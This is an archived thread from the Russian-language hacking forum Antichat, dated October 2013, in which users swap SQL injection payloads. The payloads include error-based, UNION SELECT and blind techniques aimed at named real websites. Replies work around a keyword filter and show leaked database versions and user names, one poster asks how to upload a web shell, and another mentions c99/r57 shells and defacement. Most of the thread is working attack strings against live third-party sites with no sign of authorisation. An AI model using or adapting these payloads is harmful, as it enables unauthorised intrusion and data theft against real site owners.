ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.10.2013, 04:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Always
Always said:
делают такой зпрос
'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
вывод:
Duplicate column name '5.1.69'
отправляю такой запрос
'and(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+1, 1),floor(rand(0)*2))x+from+information_schema.tabl es+group+by+x)a)='1/
вывод:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 1
в чем дело?
В том, что твои "плюсы" отправляются напрямую в субд.
2 Oxotnik, эвал без палива? Что еще, по-твоему мнению, "без палива"? с99/r57 в корне или, быть может, дефейс главной ресурса?
|
|
|
|
10.10.2013, 10:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от wacky
wacky said:
В том, что твои "плюсы" отправляются напрямую в субд.
Спасибо, первый раз с такой проблемой столкнулся!
А почему так происходит?
|
|
|
|
10.10.2013, 13:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Код:
Code:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! |
|
|
|
10.10.2013, 14:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! Тут фильтр на наличие самого слова Select в запросе.
http://elc.in.ua/study.php?id=8+and+1=1+group+by+3+--+
Ковыряю.
|
|
|
10.10.2013, 14:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00 ,floor(rand(0)*2)))having(min(0)or(1))
|
|
|
|
10.10.2013, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от Expl0ited
Expl0ited said:
http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00 ,floor(rand(0)*2)))having(min(0)or(1))
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
Code:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
|
|
|
|
10.10.2013, 14:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Код:
Code:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! http://elc.in.ua/study.php?id=8%20and(select%201%20from(select%20co unt(*),concat((select%20table_name%20from%20inform ation_schema.tables%20limit%2040,1),floor(rand(0)* 2))x%20from%20information_schema.tables%20group%20 by%20x)a)=1
не могу дальше, ели грузит сайт! походу все накинулись со сканерами)
|
|
|
|
10.10.2013, 14:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
В общем есть страничка.. boom.php?page=1&subcat= на который с ' выдает ошибку
CALL failed: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',0,5)' at line 1
Ничего не фильтрует наверно), как можно залить шелл или получить таблицы? Киньте пример мб..
|
|
|
|
10.10.2013, 15:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
Code:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
www.mebi.us/out.php?id=5 +and+mid(version(),1,1)=5
upd
Второй случай более интересен:
www.sport-trade.ru/out.php?id=-9' +union+select+1,2,3,4,5,6,7,8,9,version(),11+--+
Смотрим заголовок ответа сервера:
HTTP/1.1 302 Moved Temporarily
Servernginx/1.1.5
DateThu,10 Oct 2013 10:31:04 GMT
Content-Type text/ng
Transfer-Encoding chunked
Connectionkeep-alive
X-Powered-By PHP/5.2.17
location/out.php?id= 5.1.70-cll
Ну или смотри адресную строку.
|
|
|
|
10.10.2013, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
Code:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://www.sport-trade.ru/out.php?key=cat&a=item&item_id=7147%27%20UNION%20S ELECT%201,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14, 15,16,17+--+
http://www.mebi.us/out.php?id=9&did=311%20UNION%20SELECT%201,2,3,4,5, 6,7,8,9,10,user%28%29,12,13,14,15,16+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
